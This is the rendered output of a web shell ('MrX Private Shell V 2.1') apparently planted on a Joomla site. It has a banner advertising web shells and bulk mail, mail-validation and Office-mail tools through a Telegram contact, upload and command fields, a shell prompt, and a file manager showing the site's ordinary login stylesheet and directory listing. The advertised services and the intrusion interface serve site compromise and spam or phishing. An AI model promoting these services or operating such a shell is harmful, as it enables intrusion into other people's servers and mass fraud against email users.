__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
// Login page

.view-login,
.task-logout {

  .container-main {
    order: 1;

    @include media-breakpoint-down(md) {
      display: flex;
      flex-wrap: wrap;
      align-items: center;
      justify-content: center;
      min-height: calc(100vh - 35vh);
    }

    #content {
      @include media-breakpoint-down(md) {
        max-width: 98%;
        padding: 0;
      }
    }
  }

  .login {
    width: 100%;
    max-width: 25rem;
    padding: 30px;
    margin: 1rem;
    color: var(--template-text-dark);
    background: var(--body-bg);
    border-radius: 10px;
    box-shadow: $login-box-shadow;

    @include media-breakpoint-down(lg) {
      margin-bottom: 3rem;
    }

    img {
      width: auto;
      max-height: 4.4rem;
    }

    .logo {
      padding: 0 20px 20px;
    }

    svg.joomla-logo {
      width: 2.4rem;
      height: 4.4rem;
      background-size: 4.4rem 2.4rem;

      path {
        fill: var(--template-bg-dark);
      }
    }

    &-watermark {
      position: absolute;
      z-index: -1;
      max-width: 500px;
      transform: rotate(12deg) translate(40%, 10%);
    }

  }

  .form-group {
    position: relative;
    margin-bottom: 1.85rem;

    label {
      span {
        font-size: ($font-size-base * .9);

        @include media-breakpoint-down(sm) {
          width: 100%;
        }
      }
    }

    .form-control-feedback {
      position: absolute;
      inset-inline-end: 0;
      bottom: -1.5rem;
      font-size: ($font-size-base * .75);
      text-align: end;
    }

    .form-control-hint {
      position: absolute;
      top: .1rem;
      inset-inline-end: 0;
      font-size: ($font-size-base * .75);
      text-align: end;
    }
  }

  input:focus,
  select:focus {
    box-shadow: $login-focus-box-shadow;
  }

  h1 {
    margin-bottom: .25rem;
    color: $white;
    text-align: center;
  }

  h2 {
    font-weight: $font-weight-normal;
    color: var(--template-bg-dark-10);
  }

  .btn {
    @include media-breakpoint-only(xs) {
      padding: 8px 10px;
      font-size: ($font-size-base * .875);
    }
  }

  .form-control,
  .form-select {
    max-width: none;
  }

  .sidebar-wrapper,
  .header .logo {
    flex: 1 0 400px;
  }

  .sidebar-wrapper {
    display: flex;
    flex-direction: column;
    max-width: none;
    background-color: var(--template-sidebar-bg);

    @include media-breakpoint-down(md) {
      order: 2;
      margin-bottom: 3rem;
    }

    .main-brand {
      margin-bottom: auto;

      a {
        font-size: ($font-size-base * .875);
      }
    }

    .card-header {
      font-size: ($font-size-base * 1.125);
      color: $white;
    }

    @if $enable-dark-mode {
      @include color-mode(dark) {
        .card-header {
          background: transparent;
        }
      }
    }
  }

  #sidebar {
    align-self: flex-end;
    width: 100%;
    font-size: ($font-size-base * .875);
    --body-color: var(--template-text-light);
    color: var(--template-text-light);
    text-align: center;

    .card {
      background: rgba(0, 0, 0, .1);
      box-shadow: none;

      .module-body {
        padding: .75rem 1.25rem;
      }
    }

    @if $enable-dark-mode {
      @include color-mode(dark) {
        .card {
          background: rgba(0, 0, 0, .4);
        }
      }
    }


    @include media-breakpoint-down(md) {
      position: relative;
      bottom: 0;
    }
  }

  .container-main,
  .sidebar-wrapper {

    @include media-breakpoint-down(md) {
      flex: 1 0 100% !important;
      max-width: 100% !important;
      min-height: auto;
    }
  }

  .wrapper {
    display: flex;

    @include media-breakpoint-down(md) {
      flex-direction: column;
    }
  }

  .header {
    display: flex;

    .logo {
      &.small {
        line-height: 2.5rem;
      }
    }

    @include media-breakpoint-down(md) {
      background: var(--template-bg-dark-70);
    }
  }
}

label {
  color: $login-label-color;
}

.com_login .sidebar-wrapper .main-brand {
  flex: 1;
  flex-basis: auto;
  margin-top: 100px;
  text-align: center;

  @include media-breakpoint-down(md) {
    margin-top: 10px;
  }
}

.com_login .sidebar-wrapper #sidebar p {
  margin-bottom: .2rem;
}

.com_login .sidebar-wrapper .main-brand a,
.com_login .sidebar-wrapper #sidebar,
.com_login .sidebar-wrapper #sidebar a {
  color: var(--template-text-light);
}

.view-login {
  #wrapper.d-flex {
    @include media-breakpoint-down(md) {
      display: flex !important;
    }
  }

  #sidebar-wrapper:not(.show):not(.collapse) {
    @include media-breakpoint-down(md) {
      display: block;
    }
  }

  .invalid .form-control-feedback {
    color: var(--danger-text);
  }
}

.login_message {
  margin: 1rem 1rem 0;
}

Filemanager

Name Type Size Permission Actions
_alerts.scss File 1.63 KB 0664
_calendar.scss File 762 B 0664
_edit.scss File 280 B 0664
_form.scss File 4.02 KB 0664
_global.scss File 3.83 KB 0664
_header.scss File 3.88 KB 0664
_icons.scss File 1.81 KB 0664
_iframe.scss File 69 B 0664
_layout.scss File 367 B 0664
_lists.scss File 105 B 0664
_login.scss File 4.57 KB 0664
_modals.scss File 9.18 KB 0664
_quickicons.scss File 4.31 KB 0664
_shepard-modals.scss File 1.11 KB 0664
_sidebar-nav.scss File 653 B 0664
_sidebar.scss File 6.01 KB 0664
_switcher.scss File 570 B 0664
_toolbar.scss File 5.85 KB 0664
_treeselect.scss File 1.97 KB 0664
_utilities.scss File 2.41 KB 0664
Filemanager